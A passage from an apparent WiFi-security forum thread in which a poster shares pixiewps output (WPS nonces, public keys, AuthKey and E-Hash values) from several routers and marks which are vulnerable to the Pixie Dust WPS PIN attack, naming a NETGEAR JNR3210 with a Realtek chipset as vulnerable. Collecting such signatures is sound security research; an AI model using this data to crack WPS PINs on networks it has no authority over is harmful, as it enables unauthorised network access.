[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f2:da:93:b1:d1:6e:89:65:e6:a4:c7:a6:c6:bf:1b:80:dc:56:c5:47:d7:09:13:ba:7e:c5:96:c4:e8:a1:59:b7:5e:bb:d9:67:b8:2a:24:7a:53:9a:e0:16:2d:e8:f0:cb:a6:fe:ab:70:82:bb:17:86:47:7d:05:de:06:b8:18:2b:79:7a:3f:75:95:06:bc:12:06:a1:64:45:00:3c:0a:da:c9:0b:b8:22:31:e6:54:d0:83:a5:88:45:f9:13:0f:3f:82:de:22:9f:04:e1:26:93:2c:49:22:00:2d:7b:74:4e:a0:29:16:a3:96:c8:08:6b:5f:c0:eb:89:49:5c:1f:d0:a7:cf:33:c5:70:65:cc:1d:dc:f9:c4:7b:28:68:03:a2:5a:71:21:c4:0b:80:13:44:3c:e0:9b:be:17:7a:94:6a:9c:00:f2:8c:de:96:09:51:97:57:4b:bd:17:cf:b7:fe:8d:c1:9c:05:85:29:7a:ff:87:81:59:02:97:0f:f3:0d
[P] AuthKey: b4:20:25:cc:17:81:35:11:da:37:21:aa:5b:2c:21:02:17:a0:6a:0c:d1:1c:c0:21:5e:9a:a6:ca:8e:b2:32:b8
[P] E-Hash1: 02:31:ef:e0:30:00:9b:28:db:18:b6:1b:77:5d:b7:20:fb:0c:8a:b5:7e:41:85:33:dd:83:ae:94:4f:7a:5a:fe
[P] E-Hash2: 61:39:79:0c:67:a7:c3:2f:b0:10:98:5e:16:61:7b:e0:a6:a8:73:1f:84:bb:78:34:0c:22:64:03:cb:cc:f0:73

[soxrok2212]

Some new Signatures (tested with all 4 possible pixiewps option-combinations)

NOT VULNERABLE:

Code:

ASUS RT-N66U
Broadcom BCM4706

[P] E-Nonce: 01:5a:54:01:c1:db:32:e5:2b:33:fd:bb:8c:9d:f0:9e
[P] PKE: 8c:09:51:62:1f:45:31:98:32:a0:fc:58:0e:d5:ed:36:86:c4:b5:ab:7c:8c:c7:30:67:40:a9:ff:e7:62:8f:9b:7d:1c:31:d4:95:96:ce:ea:5b:b3:43:ba:d2:f7:12:8d:8e:48:01:fd:8c:0c:12:17:53:e7:aa:29:9b:9a:06:31:4f:73:e5:78:cc:b8:7e:99:26:1d:be:db:cb:69:45:f3:19:21:df:ab:cd:91:b5:d7:94:7d:83:b9:9e:b8:b5:55:61:ac:c2:78:17:f5:92:01:d4:a6:ed:fe:82:2f:83:23:87:05:5d:69:18:97:9e:c6:6f:34:cb:02:e2:a0:51:d1:18:24:c3:cc:7c:d7:ab:80:93:95:b6:48:ea:92:53:5a:96:6a:f9:4d:3e:a5:07:6d:4f:6a:20:cd:bf:5b:e0:b5:dc:b2:f1:55:17:43:7b:2c:26:0a:d2:05:ba:3a:87:da:dd:63:5c:5d:27:f7:84:4d:47:4a:b2:59:6a:3e:43:9b
[P] PKR: ae:55:61:51:7b:8d:b4:33:40:4b:18:75:f2:28:2f:5b:eb:68:17:2e:c3:d6:2b:c0:6e:9e:67:fb:82:10:c5:36:d3:b3:86:77:09:bd:fd:5d:fe:7d:8d:29:1b:c2:81:65:9d:8e:f9:88:fa:a7:49:20:3e:f1:ae:61:d6:16:f8:02:53:40:d6:bc:07:f8:b4:93:39:33:e4:77:58:10:57:04:dd:2c:01:db:40:87:96:61:f8:42:61:97:95:2a:aa:64:d8:8a:98:f7:82:5c:f7:d6:db:04:f3:0c:b9:0b:b0:b2:ad:d7:92:92:b3:7c:30:fc:76:e2:f5:d7:76:73:54:7c:74:21:61:db:91:53:94:f7:f4:24:4c:5d:f5:8c:7f:e3:4e:5d:5f:36:79:bb:a7:37:ac:6c:66:c5:b4:84:bd:b1:66:1f:eb:94:96:e7:6e:18:a3:1e:64:b5:df:4c:7e:ef:44:30:a1:08:f3:7e:59:df:38:d1:2b:71:d4:3e:3e:cc
[P] AuthKey: 0f:7f:32:3f:65:e4:3d:8d:b2:35:2d:a1:12:e7:3b:3c:f6:65:44:8e:13:16:85:e5:8e:14:82:83:66:7b:48:d2
[P] E-Hash1: 8d:53:7e:3c:cf:24:16:77:c6:6e:f4:09:dc:b7:18:44:a3:19:98:e8:c5:ce:5a:ed:b2:70:db:55:b5:ab:6e:b4
[P] E-Hash2: 28:29:96:3e:0e:33:87:0a:a4:90:17:9d:97:3a:10:7a:6b:f3:44:52:5f:2f:a6:8c:3b:23:96:19:c5:b5:e8:94

NOT VULNERABLE:

Code:

NETGEAR WN3100RP (WiFi-Repeater)

[P] E-Nonce: ad:d5:5c:93:e2:e9:c1:59:87:ad:27:13:76:58:bf:32
[P] PKE: d0:0b:9a:f7:6d:aa:44:d9:7a:56:63:04:52:8b:39:e8:44:67:8b:99:3f:4c:70:b8:36:df:95:bf:3f:91:f7:89:37:c8:b2:1d:df:7b:43:0f:a6:06:99:a0:20:45:06:f9:ca:a6:be:f4:cc:e2:68:bf:c8:db:0e:75:b6:e4:a8:0a:ab:5a:3f:d2:29:08:39:84:0c:87:85:29:7f:e2:0f:86:53:05:c0:1a:35:fd:2d:40:c9:4d:00:41:8f:f4:9f:2b:48:71:3e:53:95:ac:ac:e6:97:68:a9:9f:11:f0:fb:2c:1b:4f:0f:24:e3:03:3a:f5:e9:94:10:99:aa:5e:6c:5f:2f:68:ef:02:77:7b:bf:0c:c1:05:bc:96:4d:d8:2b:1d:34:7e:b8:c7:a5:3c:2f:e4:31:40:60:24:98:5d:3f:0c:53:b1:1f:e3:53:76:31:90:b4:60:73:17:ae:8b:f9:1c:f9:33:d0:84:f8:cb:3c:ad:38:01:14:79:2d:bb:6e:90
[P] PKR: ab:a4:18:77:a4:9e:d8:05:e2:a3:bb:ae:b6:bf:06:a5:71:a9:02:78:8a:65:ba:76:15:ff:59:14:a3:49:f4:a0:c3:09:f1:fe:58:50:e1:da:7a:dc:fc:90:9f:4e:84:b6:dc:04:b9:50:ac:fe:a0:22:4e:64:7d:ec:d5:2d:cf:20:29:d9:37:48:8d:cc:4b:3e:2b:b8:3b:af:e6:77:c8:2c:f7:33:04:ef:48:61:3c:ba:93:ec:e0:31:61:80:4b:b4:c4:9d:6f:8b:7b:71:19:41:c8:8f:66:83:b3:26:dc:3f:0c:0d:e9:0a:ee:1e:1b:65:c3:67:c3:16:7c:16:1a:30:8b:bc:48:bb:ec:18:93:71:74:17:ef:3f:ea:ad:04:71:59:6b:2e:7d:ca:74:0a:0b:1a:73:5c:cd:14:08:e6:0a:07:40:dd:d1:ca:f3:cc:47:ad:93:cf:c6:67:8b:fa:25:b0:55:dc:22:5f:a0:32:60:60:96:dc:d0:a2:10:f9:71
[P] AuthKey: 9e:fe:ad:05:13:1c:67:c1:d4:fa:ab:70:03:92:b4:d2:b8:76:ad:85:f8:c8:39:b4:fb:fe:2d:aa:fc:ed:b0:d1
[P] E-Hash1: ae:a9:02:51:13:d3:56:4d:e8:1c:71:88:bf:ab:a7:71:90:08:3d:98:4f:47:1d:f7:40:39:e9:65:08:5d:05:aa
[P] E-Hash2: 45:01:86:0d:b0:2c:17:4a:32:2e:a0:d7:ca:8b:3d:ca:61:a6:eb:32:7c:2d:e5:aa:9e:4f:c4:3f:c3:de:e2:79

Code:

VULNERABLE:

NETGEAR JNR3210
Realtek RTL8198

[P] E-Nonce: 34:5c:4d:63:39:13:1f:67:75:51:78:8b:70:67:6e:46
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: f2:da:93:b1:d1:6e:89:65:e6:a4:c7:a6:c6:bf:1b:80:dc:56:c5:47:d7:09:13:ba:7e:c5:96:c4:e8:a1:59:b7:5e:bb:d9:67:b8:2a:24:7a:53:9a:e0:16:2d:e8:f0:cb:a6:fe:ab:70:82:bb:17:86:47:7d:05:de:06:b8:18:2b:79:7a:3f:75:95:06:bc:12:06:a1:64:45:00:3c:0a:da:c9:0b:b8:22:31:e6:54:d0:83:a5:88:45:f9:13:0f:3f:82:de:22:9f:04:e1:26:93:2c:49:22:00:2d:7b:74:4e:a0:29:16:a3:96:c8:08:6b:5f:c0:eb:89:49:5c:1f:d0:a7:cf:33:c5:70:65:cc:1d:dc:f9:c4:7b:28:68:03:a2:5a:71:21:c4:0b:80:13:44:3c:e0:9b:be:17:7a:94:6a:9c:00:f2:8c:de:96:09:51:97:57:4b:bd:17:cf:b7:fe:8d:c1:9c:05:85:29:7a:ff:87:81:59:02:97:0f:f3:0d
[P] AuthKey: b4:20:25:cc:17:81:35:11:da:37:21:aa:5b:2c:21:02:17:a0:6a:0c:d1:1c:c0:21:5e:9a:a6:ca:8e:b2:32:b8
[P] E-Hash1: 02:31:ef:e0:30:00:9b:28:db:18:b6:1b:77:5d:b7:20:fb:0c:8a:b5:7e:41:85:33:dd:83:ae:94:4f:7a:5a:fe
[P] E-Hash2: 61:39:79:0c:67:a7:c3:2f:b0:10:98:5e:16:61:7b:e0:a6:a8:73:1f:84:bb:78:34:0c:22:64:03:cb:cc:f0:73

Sweet thanks! I see you found Realtek AP and had success!! Congrats!